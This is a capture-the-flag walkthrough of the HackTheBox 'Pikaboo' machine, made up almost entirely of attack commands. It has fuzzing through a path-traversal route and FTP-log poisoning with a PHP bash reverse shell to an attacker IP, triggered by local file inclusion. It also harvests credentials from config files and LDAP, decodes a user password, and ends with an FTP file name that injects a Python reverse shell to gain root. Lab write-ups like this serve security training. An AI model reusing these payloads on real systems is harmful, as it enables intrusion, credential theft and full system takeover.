HackThebox – Pikaboo
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A -v -T4 -Pn 10.10.10.249
┌──(rootkali)-[/home/kali/Downloads]
└─# wfuzz -u http://10.10.10.249/admin../FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 –hc 404,401,403
So in this result, I have got one interesting directory which is server-status.
When I enter this directory in the browser I have got some interesting information (shown below image).
http://10.10.10.249/admin../server-status/
http://10.10.10.249/admin../admin_staging/
Now we are trying for /var/log/vsftpd.log.
http://10.10.10.249/admin../admin_staging/index.php?page=/var/log/vsftpd.log
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvnp 4444
┌──(rootkali)-[/home/kali/Downloads]
└─# ftp 10.10.10.249
Name (10.10.10.249:kali): <?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.14/4444 0>&1′”); ?>
┌──(rootkali)-[/home/kali/Downloads]
└─# curl http://10.10.10.249/admin../admin_staging/index.php?page=/var/log/vsftpd.log
www-data@pikaboo:/var/www/html/admin_staging$ cd /home
www-data@pikaboo:/home$ ls
www-data@pikaboo:/home$ cd pwnmeow
www-data@pikaboo:/home/pwnmeow$ ls
www-data@pikaboo:/home/pwnmeow$ cat user.txt
www-data@pikaboo:/home/pwnmeow$ cd ..
www-data@pikaboo:/home$ cd ..
www-data@pikaboo:/$ ls
www-data@pikaboo:/$ cd opt
www-data@pikaboo:/opt$ ls
www-data@pikaboo:/opt$ cd pokeapi
www-data@pikaboo:/opt/pokeapi$ ls
www-data@pikaboo:/opt/pokeapi$ grep -iRl ‘password’
Further analysis of this file I got one interesting thing which is ldap and which get some credentials using ldap.
www-data@pikaboo:/opt/pokeapi$ cat config/settings.py
“PASSWORD”: “J~42%W?PFHl]g”
www-data@pikaboo:/opt/pokeapi$ ldapsearch -x -LLL -h 127.0.0.1 -D ‘cn=binduser,ou=users,dc=pikaboo,dc=htb’ -w ‘J~42%W?PFHl]g’ -b ‘dc=pikaboo,dc=htb’
homeDirectory: /home/pwnmeow
userPassword:: X0cwdFQ0X0M0dGNIXyczbV80bEwhXw==
decode the same
_G0tT4_C4tcH_’3m_4lL!_
┌──(rootkali)-[/home/kali/Downloads]
└─# ftp 10.10.10.249
username pwnmeow
password _G0tT4_C4tcH_’3m_4lL!_
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvp 4040
ftp> cd versions
ftp> put “|python3 -c ‘import os,pty,socket;s=socket.socket();s.connect((“\”10.10.14.14\””,4040));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(“\”sh\””)’;.csv”
Now wait for 1 -4 min to get the root shell.